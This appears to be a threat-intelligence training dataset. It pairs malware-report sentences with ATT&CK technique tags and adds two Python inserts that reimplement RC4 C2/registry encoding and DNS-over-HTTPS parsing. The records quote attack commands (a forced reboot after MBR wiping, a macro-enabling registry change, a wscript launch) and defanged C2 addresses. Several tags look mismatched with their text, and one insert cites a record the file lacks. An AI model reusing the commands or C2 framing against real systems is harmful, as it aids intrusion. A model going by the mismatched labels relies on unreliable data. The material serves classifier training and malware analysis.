{"text1":"As described in other blog posts, Remcos appears to be developed in C++. As the release notes show, it is actively maintained. 17, 2017 Remcos has the functionalities that are typical of a RAT. It is capable of hiding in the system and using malware techniques that make it difficult for the typical user to detect the existence of Remcos. A good example is the anti-analysis section: It is checking for an outdated artifact, the 'SbieDll.dll'. In our opinion, there are not many analysts using Sandboxie these days anymore. Below you can see the Remcos VMware detection code: The following is a code sample from aldeid.com: The blog referenced above has already described several functions of Remcos features in detail. We would like to focus on Remcos' cryptographic implementation. It uses RC4 pretty much everywhere when there is a need to decode or encode any data. Examples are registry entries, C2 server network communication or file paths shown below: The exepath registry data is base64-encoded, RC4-encrypted data. This can be converted into the typical RC4 pseudo code","labels":"['T1027']"}
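Added example, written for this page rather than taken from the Remcos or PlugX analyses, and serving both the Remcos record here and the PlugX record above: a plain RC4 implementation plus the two framings the records describe. For PlugX the data is compressed and then RC4-encrypted before it goes to the C2, and decoded in reverse; zlib stands in for the compressor, which the record does not name. For Remcos the registry value (the "exepath" entry) is RC4-encrypted and then base64-encoded. The keys and plaintexts are constructed; the two known RC4 test vectors in the test are the usual public ones.

```python
import base64
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA). The keystream is XORed in, so one function
    both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# PlugX-style C2 framing: compress, then encrypt; the receiver reverses it.
# zlib is a stand-in; the record does not say which compressor PlugX uses.
def c2_encode(key: bytes, plaintext: bytes) -> bytes:
    return rc4(key, zlib.compress(plaintext))


def c2_decode(key: bytes, wire: bytes) -> bytes:
    return zlib.decompress(rc4(key, wire))


# Remcos-style registry value: RC4, then base64.
def registry_encode(key: bytes, text: str) -> str:
    return base64.b64encode(rc4(key, text.encode("utf-8"))).decode("ascii")


def registry_decode(key: bytes, value: str) -> str:
    return rc4(key, base64.b64decode(value, validate=True)).decode("utf-8")
```

The February 2022 PlugX variant that receives its RC4 key in the first HTTP response needs no code change: `c2_decode` is called with the key parsed out of that response instead of the hard-coded one, which is also why a decryptor for such traffic must capture the first exchange.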
|
|
{"text1":"The Word document has a malicious macro in it and, when opened by the victim, it will drop and execute a file in a specific folder","labels":"['T1204.002']"}
|
|
{"text1":"This time, APT15 opted for a DNS based backdoor: RoyalDNS. The persistence mechanism used by RoyalDNS was achieved through a service called \u2018Nwsapagent","labels":"['T1543.003']"}
|
|
{"text1":"To gain access to victim environments, the threat actor began by targeting handpicked employees using LinkedIn messaging and email, advertising fake jobs to lure recipients into checking into the supposed offers. In one case, we uncovered evidence indicating that the attacker had established communication with a victim via email and convinced them to click on a Google Drive URL purporting to contain an attractive job advert. Once clicked, the URL displayed the message, \u201cOnline preview is not available,\u201d then presented a second URL leading to a compromised or rogue domain, where the victim could download the payload under the guise of a job description","labels":"['T1566.003']"}
|
|
{"text1":"TajMahal\u2019 is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we\u2019ve ever seen for an APT toolset","labels":"['T1027']"}
|
|
{"text1":"When loaded, the FoggyWeb backdoor (originally named Microsoft.IdentityServer.WebExtension.dll by its developer) functions as a passive and persistent backdoor that allows abuse of the Security Assertion Markup Language (SAML) token. The backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment. The custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet\/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. This version of FoggyWeb configures listeners for the following hardcoded URI patterns (which might vary per target","labels":"['T1550', 'T1040']"}
|
|
{"text1":"After completing this wiping functionality, the sample will reboot the system using the following command line, which will render it unusable when the system reboots as the important system locations and files have been overwritten with random data","labels":"['T1529']"}
|
|
{"text1":"Typical lateral movement methods were employed, using Windows commands. First, a network connection with a remote host was established using the command \u201cnet use","labels":"['T1049']"}
|
|
{"text1":"1) Loads the image resource with name `T__6541957882` into memory. 3) Adds `0xEE` to the bytes to decode the DLL. 4) Reflectively loads decoded DLL into memory and executes it","labels":"['T1620']"}
|
|
{"text1":"Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php (see figure 4","labels":"['T1071.003', 'T1059.006']"}
|
|
{"text1":"PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance","labels":"['T1059.001']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. MSGet typically downloads encoded binaries from hard-coded URLs. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR \u2014 This tool extracts tools for lateral movement and compresses data for exfiltration. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1132.001']"}
|
|
{"text1":"1) Right after midnight, the attackers connected to a machine on the targeted network most probably via RDP. 3) The attacker used psexec.exe to execute \u201cCobalt.Client.exe\u201d, which is the Pay2Key ransomware itself, on different machines within the organization","labels":"['T1090', 'T1090.001']"}
|
|
{"text1":"If the system is a 64-bit version of Windows, it downloads and executes a specific 64-bit version of the malware thanks to a powershell script","labels":"['T1059.001']"}
|
|
{"text1":"Remote templates are a feature of Microsoft Word which allow a document to load a template to be used in a document \u2013 this template can be externally hosted, either on a file share, or on the internet. The template is then loaded when the document is opened. The Inception attackers use this feature in a malicious context as shown in Figure 1 below","labels":"['T1221']"}
|
|
{"text1":"Collect document files with the suffixes \".txt\", \".doc\" and \".xls\" in the Internet cache directory of the IE browser","labels":"['T1005']"}
|
|
{"text1":"If the user does not have permissions to add a service, the installation routine attempts to add persistence by creating the following registry key that will run the functional code within Emissary via an exported function named \"DllRegister","labels":"['T1547.001']"}
|
|
{"text1":"Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box","labels":"['T1204.002']"}
|
|
{"text1":"This group uses spear-phishing emails to deliver both malicious Word and PDF documents, and attempts to social engineer the victim into an infection rather than trying to exploit a software vulnerability","labels":"['T1566.001']"}
|
|
{"text1":"The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (CVE 2019-10149) (External Remote Services [T1133]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (CVE-2018-13379) for Initial Access [TA0001] and a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [TA0004] within the network (Valid Accounts [T1078]). These vulnerabilities can also be leveraged to compromise other devices on the network (Lateral Movement [TA0008]) and to maintain Persistence [TA0003","labels":"['T1133', 'T1210']"}
|
|
{"text1":"UnionCryptoUpdater.exe does not immediately download the stage 2 malware but instead downloads it after a time specified by the C2 server. This delay could be implemented to prevent researchers from directly obtaining the stage 2 malware","labels":"['T1497.003']"}
|
|
{"text1":"It registers as a system service to ensure its automatic execution at every system startup by adding the following registry keys","labels":"['T1547.001']"}
|
|
{"text1":"After an initial dormant period of up to two weeks, it retrieves and executes commands, called \u201cJobs\u201d, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services","labels":"['T1497.003']"}
|
|
{"text1":"Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample","labels":"['T1573.001']"}
|
|
{"text1":"From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server. RIPTIDE\u2019s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication","labels":"['T1573.001']"}
|
|
{"text1":"Persistence was established via a crontab entry for a non-root user. With the binary named to masquerade as a legitimate file on the system and placed in a hidden directory, a crontab entry was created with a @reboot line so the GoldMax binary would execute again upon system reboot. Additionally, the threat actor used the nohup command to ignore any hangup signals, and the process will continue to run even if the terminal session was terminated","labels":"['T1053.003']"}
|
|
{"text1":"In analyzing FinFisher, the first obfuscation problem that requires a solution is the removal of junk instructions and \u201cspaghetti code\u201d, which is a technique that aims to confuse disassembly programs. Spaghetti code makes the program flow hard to read by adding continuous code jumps, hence the name. An example of FinFisher\u2019s spaghetti code is shown below","labels":"['T1027.001', 'T1027']"}
|
|
{"text1":"In April 2018 we discovered a new Octopus sample pretending to be Telegram Messenger with a Russian interface. We couldn\u2019t find any legitimate software that this malware appears to be impersonating; in fact, we don\u2019t believe it exists. Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen","labels":"['T1036']"}
|
|
{"text1":"Later, the malware enters in a big block of trash code that also includes some elements to decrypt strings and important information for later","labels":"['T1027']"}
|
|
{"text1":"The DNS resolution is performed using DNS over HTTPS (DoH). The malware sends an HTTP POST request to a Google DNS Server (8.8.8.8) using the following headers","labels":"['T1572']"}
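Added example (not from the analysis above): what the body of a DNS-over-HTTPS POST actually contains and how to read the answer back out, since the record's own header list is not reproduced here and is not reconstructed. Under RFC 8484 the POST body is a wire-format DNS message (Content-Type `application/dns-message`), so the same RFC 1035 builder and parser you would use on UDP/53 apply to the HTTP body. `build_a_response` exists only to produce an offline reply for the parser; the name and addresses are constructed.

```python
import struct


def build_dns_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Wire-format DNS query (RFC 1035), i.e. the body of a DoH POST.
    Flags 0x0100 = recursion desired; qtype 1 = A, class 1 = IN."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.strip(".").split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", qtype, 1)


def _skip_name(msg: bytes, off: int) -> int:
    """Advance past a possibly compressed name; a 0xC0xx pointer ends it."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length


def parse_a_records(msg: bytes) -> tuple:
    """Return (txid, [IPv4 strings]) from a DNS response body."""
    txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack_from(">HHHHHH", msg, 0)
    off = 12
    for _ in range(qdcount):
        off = _skip_name(msg, off) + 4              # skip QTYPE + QCLASS
    ips = []
    for _ in range(ancount):
        off = _skip_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack_from(">HHIH", msg, off)
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(".".join(str(b) for b in msg[off:off + 4]))
        off += rdlen
    return txid, ips


def build_a_response(query: bytes, ips: list, ttl: int = 60) -> bytes:
    """Constructed resolver reply for the given query, so the parser can be exercised
    offline; each answer points back at the question name with the 0xC00C pointer."""
    txid = struct.unpack_from(">H", query, 0)[0]
    question = query[12:]
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, len(ips), 0, 0)
    answers = b"".join(
        b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, 4)
        + bytes(int(p) for p in ip.split("."))
        for ip in ips)
    return header + question + answers
```

On the wire the only visible artefacts are TLS to 8.8.8.8 and a POST with a short binary body; with TLS inspection or an endpoint hook, running `parse_a_records` over those bodies turns them back into the domain lookups a DNS-based detection expects to see.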
|
|
{"text1":"While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group\u2019s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. In our case the attacker abused cmstp to execute JavaScript scriptlet (XML with JS) that is downloaded from the e-dropbox[.]biz site. Although some security solutions will block all PureBasic programs (wrong move \u2013 there are plenty of legitimate PureBasic programs in use today), it\u2019s a smart move made by the attacker group. The right side of the pair is the name of the JavaScript in the next stage (stage 4) , while the left side of the pair represents the file that will be downloaded as part of stage 5. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Stage 5 - JavaScript Backdoor . The last stage JavaScript is downloaded from hxxps:\/\/server.vestacp[.]kz\/robots.txt. Organizations should expect to see much more coming from all Cobalt Group factions during the next year","labels":"['T1105']"}
{"text1":"To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. We will also present various payloads, including an RPC-based backdoor and a backdoor leveraging OneDrive as its Command and Control (C&C) server. Then, it calls VirtualProtect to allow writing at the retrieved address. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. RPC backdoor . Turla has developed a whole set of backdoors relying on the RPC protocol. OneDrive credentials in PowerStallion script . It is interesting to note that Turla operators used the free email provider GMX again, as in the Outlook Backdoor and in LightNeuron. Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. Modification of MAC times of the local log file . We believe this backdoor is a recovery access tool in case the main Turla backdoors, such as Carbon or Gazer, are cleaned and operators can no longer access the compromised computers. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools","labels":"['T1106']"}
{"text1":"Gain access to the victim\u2019s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator\u2019s account","labels":"['T1021.001', 'T1090.001']"}
{"text1":"Following initial access, GRIM SPIDER focuses on collecting credentials from the compromised hosts and uses existing RDP in an attempt to get a domain administrator account and access to the Windows Domain Controller. This process can take several iterations of harvesting credentials, connecting to new systems and establishing persistence","labels":"['T1078']"}
{"text1":"All versions generate a list of files to encrypt by parsing the available drives and directories, but will avoid adding files that are of relevance to the malware","labels":"['T1083']"}
{"text1":"BOOM.exe, tracked by Microsoft as \u201cBoomBox\u201d, can be best described as a malicious downloader. The downloader is responsible for downloading and executing the next-stage components of the infection. These components are downloaded from Dropbox (using a hardcoded Dropbox Bearer\/Access token","labels":"['T1105', 'T1102']"}
{"text1":"There doesn\u2019t appear to be anything unique when it comes to the Word Document and its standard ploy of pushing recipients to \u201cenable content\u201d and run a malicious macro. An\u00a0analysis of the link from the phishing e-mail contains a base64-encoded string representing the recipient\u2019s address. Using that string, attackers insert the recipient\u2019s name into the filename of the World document","labels":"['T1140']"}
{"text1":"The downloader collects basic system information and sends it via an HTTP POST request to a hardcoded command and control (C&C) server (Figure 10","labels":"['T1071.001']"}
{"text1":"The C2 domain name for the DNS communication is hardcoded and obfuscated using XOR. The backdoor will generate a subdomain using a custom domain generation algorithm (DGA) and try to send an initial beacon to the C2 via DNS tunneling","labels":"['T1568.002']"}
{"text1":"However, the subsequent Diskcoder.C outbreak suggests that the attackers had access to the update server of the legitimate software. Using access to this server, attackers pushed a malicious update that was applied automatically without user interaction","labels":"['T1195.002']"}
{"text1":"The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware. If they are installed, nothing will be dropped. We'll now break down the 5kplayer trojanized installer","labels":"['T1518.001']"}
{"text1":"In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources. This will cause the referenced files to be downloaded in the case of INF files, to be executed with specific commands - An attacker can exploit this vulnerability to execute arbitrary code but will need a specifically crafted file and use social engineering methods (observed in this campaign) to convince a user to open it","labels":"['T1203']"}
{"text1":"The directory is used as temporary storage for files containing collected data about the compromised computer. Such files share a common naming convention, encryption algorithm and structure. They are encrypted by a simple variation of the XOR cipher which is used across the malware components. The type of the file can be derived from the 4-byte control sequences placed at the beginning of the file","labels":"['T1560.003']"}
{"text1":"The key descriptor\u2019s string contains Bayren_Munchen which seems likely to refer to the German soccer team FC Bayern Munich. Regardless, it is not the content of the key descriptor \u2013 but its length \u2013 that matters, with that length used to retrieve the XOR key used to encrypt the payload","labels":"['T1140']"}
{"text1":"The older \u201cmode\u201d variant of BitPaymer uses the Windows registry for persistence, while the newer service variant will attempt to install itself as a service","labels":"['T1543.003']"}
{"text1":"A while loop is used to join a series of data blobs into the allocated buffer, and the contents of this buffer are then decrypted with an XOR based algorithm. Once decrypted, the crypter jumps into the data blob which turns out to be a shellcode responsible for decrypting the actual payload. The shellcode copies the encrypted payload into another buffer allocated by calling the VirtualAlloc API, and then decrypts this with an XOR based algorithm in a similar way to that described above. To execute the payload, the shellcode replaces the crypter\u2019s code in memory with the code of the payload just decrypted, and jumps to its entry point","labels":"['T1140']"}
{"text1":"TA453, an\u00a0Iranian-state\u00a0aligned actor,\u00a0masqueraded as British scholars\u00a0to covertly target individuals of intelligence interest to the Iranian government in what Proofpoint has dubbed Operation\u00a0SpoofedScholars. The email conversations were benign until TA453 provided a link to a compromised website hosting a credential harvesting page. The use of a legitimate but actor-compromised website is an increase in sophistication compared to TA453\u2019s historical Tactics, Techniques, and Procedures of using actor-controlled credential phishing websites. Proofpoint has worked with the appropriate authorities to conduct victim notification","labels":"['T1584.001']"}
{"text1":"Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1","labels":"['T1057']"}
{"text1":"The code injected into an msiexec.exe sends a beacon signal to the CnC server and awaits commands","labels":"['T1218.007']"}
{"text1":"Run commands on Windows system remotely using Winexe: Winexe is a GNU\/Linux-based application that allows users to execute commands remotely on WindowsNT\/2000\/XP\/2003\/Vista\/7\/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows execution of most of the windows shell commands","labels":"['T1569.002']"}
{"text1":"As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don\u2019t have any content with social engineering directing potential victims to click an Enable Content button. It seems that the attackers are depending on the victims to decide entirely on their own whether to click it or not","labels":"['T1204.002']"}
{"text1":"TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware","labels":"['T1012']"}
{"text1":"Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions","labels":"['T1083']"}
{"text1":"Most of CARBANAK\u2019s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time","labels":"['T1027']"}
{"text1":"The Bazar backdoor is a new stealthy malware, part of the TrickBot group\u2019s toolkit arsenal and leveraged for high-value targets. The Bazar loader is used to download and execute the Bazar backdoor on the target system. The goal of this backdoor is to execute binaries, scripts, modules, kill processes, and then remove itself from the compromised machine. The samples used in this campaign heavily rely on\u00a0control flow obfuscation","labels":"['T1104']"}
{"text1":"To evade protections, Egregor create a Group Policy Object to disable Windows Defender and try to takedown any anti-virus console prior to ransomware execution","labels":"['T1562.001']"}
{"text1":"Adds persistence on the system by creating a shortcut in the user\u2019s Startup folder with the correct cmdline arguments","labels":"['T1547.001', 'T1547.009']"}
{"text1":"The malware contains 1 function, the purpose is to open the drive of the infected system (\\\\.\\PhysicalDrive0) and write the following data to the MBR: You can see the \"Are you Happy. After writing to the MBR, the malware reboots the machine with the following command: c:\\windows\\system32\\shutdown \/r \/t 1 After the reboot, the MBR displays the following string to the user: The link to the other campaigns was the following PDB path","labels":"['T1529']"}
{"text1":"The figure below shows the example of two of several possible command codes. Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal","labels":"['T1105']"}
{"text1":"The macro finishes by running the dropped VBScript \"AppPool.vbs\" file by running \"wscript C:\\ProgramData\\WindowsAppPool\\AppPool.vbs\". When first executed, the \"AppPool.vbs\" file will create the following scheduled task to execute every minute, which provides BONDUPDATER persistence and the ability to continually run on the system as the Trojan does not have a main loop to carry out its functionality","labels":"['T1053.005']"}
{"text1":"Starting from August 2020, Pawn Storm has sent several spear phishing emails with a malicious RAR attachment. Among the earliest samples we received were two almost identical RAR files that contained a file called info.exe","labels":"['T1566.001']"}
{"text1":"At periodic offsets, the bootloader overwrites sectors of an infected host\u2019s entire hard drive, with a message similar to the ransom note, padded with additional bytes (Figure 2","labels":"['T1561.001']"}
{"text1":"Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive\u2019s type. If the drive type is not a CD-ROM, files on the drive are encrypted. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files","labels":"['T1083', 'T1082', 'T1016']"}
{"text1":"It\u2019s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes. It\u2019s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. 9) Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes","labels":"['T1490']"}
{"text1":"After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. The decryption algorithm is RC4, which takes the hardcoded path to form the decryption key. If the decrypted payload is valid, it picks a specific existing Windows Service \u2014 LanmanServer, which is run by svchost.exe \u2014 and injects the decrypted shellcode into the legitimate service. In most cases, the payload is a first-stage backdoor, and its main purpose is to retrieve second-stage payloads\u00a0\u2014 either by connecting to a C&C server or opening a port to wait for external connections and load incoming executables","labels":"['T1140']"}
{"text1":"Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started","labels":"['T1135']"}
{"text1":"This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability","labels":"['T1190']"}
{"text1":"The email attachment is encrypted and stored in the compressed package, and a decryption password is provided in the mail body to bypass the security detection of the email gateway","labels":"['T1027']"}
{"text1":"Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the\u00a0PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory\u2019s content via ReadProcessMemory() API two chunks at a time. It then captures Track 1 and Track 2 credit card (CC) data. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. Other versions may just encode the plain Credit Card Data it with Base64","labels":"['T1005', 'T1560']"}
{"text1":"Lastly, the attackers used Comodo code-signing certificates several times during the course of the campaign. Many of the above TTPs are not unique to ITG08, but collectively, and with the use of More_eggs, strengthen the link to this group","labels":"['T1047']"}
{"text1":"Other interesting keys include LSMinimumSystemVersion which indicates the (malicious) application is compatible with OSX 10.7 (Lion), and NSUIElement key which tells the OS to execute the application without a dock icon nor menu (i.e","labels":"['T1564.003']"}
{"text1":"The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it\u2019s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling \u2018fudpages\u2019, was found during this campaign activity based on their utilization of shared infrastructure. One specific Microsoft document drew our attention. 446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25) This Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206","labels":"['T1566.001']"}
{"text1":"After installation, a keylogging routine begins. The malware writes keystrokes and window information to a filename in the present working directory with the following filename","labels":"['T1074.001']"}
{"text1":"A separate communication channel is created for each installed module. The communication protocol used is TLS over TCP. The communication is handled with the HP-Socket library. All the messages are RC4 encrypted using the hardcoded key. If the size of the message to be transferred is greater than or equal to 4KB, it is first compressed using zlib\u2019s Deflate implementation","labels":"['T1095']"}
{"text1":"This component achieves persistence through the Run registry key and has full backdoor capabilities: it can download and execute binaries, run arbitrary commands or upload files from the victim computer to the C&C server","labels":"['T1547.001']"}
{"text1":"The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started","labels":"['T1529']"}
{"text1":"Shathak or TA551 is the name some security researchers have given to a specific distribution method that uses password-protected ZIP archives as attachments to malspam. It has used Word document templates targeting English-, Italian-, German- and Japanese-speaking recipients. Shathak\/TA551 has been active at least as early as February 2019","labels":"['T1566.001']"}
{"text1":"MechaFlounder begins by entering a loop that will continuously attempt to communicate with its C2 server. The Trojan will use HTTP to send an outbound beacon to its C2 server that contains the user's account name and hostname in the URL. The code, seen in Figure 2, builds the URL by concatenating the username and hostname with two dashes \"--\" between the two strings. The code then creates the URL string by using the username and hostname string twice with the back-slash \"\\\" character between the two and by appending the string \"-sample.html","labels":"['T1041']"}
{"text1":"The malware scans for both open TCP ports 135 (RPC) and 1433(MSSQL) against the target, be it internal or external, and probes for the credential weakness in attempt to gain unauthorized access","labels":"['T1046']"}
{"text1":"Since FoggyWeb runs in the context of the main AD FS process, it inherits the AD FS service account permissions required to access the AD FS configuration database. This contrasts with tools such as ADFSDump that must be executed under the user context of the AD FS service account","labels":"['T1005']"}
{"text1":"If the scanning target is an IP address, Xbash will try to scan many TCP or UDP ports. Here are part of services they\u2019re probing and the ports used","labels":"['T1046']"}
{"text1":"Samples compiled in 2017 and 2018 were hard-coded with specific URI patterns to communicate with the C2 server via HTTP POST requests","labels":"['T1071.001']"}
{"text1":"Dedicated methods resolve additional strings and API calls at runtime, rendering the PE even more difficult to analyze. Below is an example of the method responsible for resolving the .bazar domains. It loads an obfuscated string, and deobfuscates it using the first character of the domain name as a XOR key for the rest of the string","labels":"['T1140']"}
{"text1":"SMOKEDHAM (127bf1d43313736c52172f8dc6513f56) is a .NET-based backdoor that supports commands, including screen capture and keystroke capture. The backdoor may also download and execute additional PowerShell commands from its command and control (C2) server","labels":"['T1059.001']"}
{"text1":"EvilBunny is a multi-threaded bot with an integrated scripting engine. It incorporates a Lua engine and downloads and executes Lua scripts to reach a certain level of polymorphism. The Lua scripts can call back into the C++ code to alter the malware behavior at runtime","labels":"['T1059.003']"}
{"text1":"Despite this indictment and other disclosures of COBALT DICKENS campaigns, the threat group (also known as Silent Librarian) shows no signs of stopping its activity as of this publication. CTU\u2122 researchers have observed the threat actors using free online services as part of their operations, including free certificates, domains, and publicly available tools","labels":"['T1608.005']"}
{"text1":"This function keeps receiving data from the system clipboard and then determines if it is a valid bitcoin wallet address. If yes, it overwrites the wallet address with the attacker\u2019s","labels":"['T1115', 'T1565.002']"}
{"text1":"After being extricated from the network, Dark Halo then returned a second time, exploiting a vulnerability in the organization's Microsoft Exchange Control Panel. Near the end of this incident, Volexity observed the threat actor using a novel technique to bypass Duo multi-factor authentication (MFA) to access the mailbox of a user via the organization's Outlook Web App (OWA) service. Finally, in a third incident, Dark Halo breached the organization by way of its SolarWinds Orion software in June and July 2020","labels":"['T1190']"}
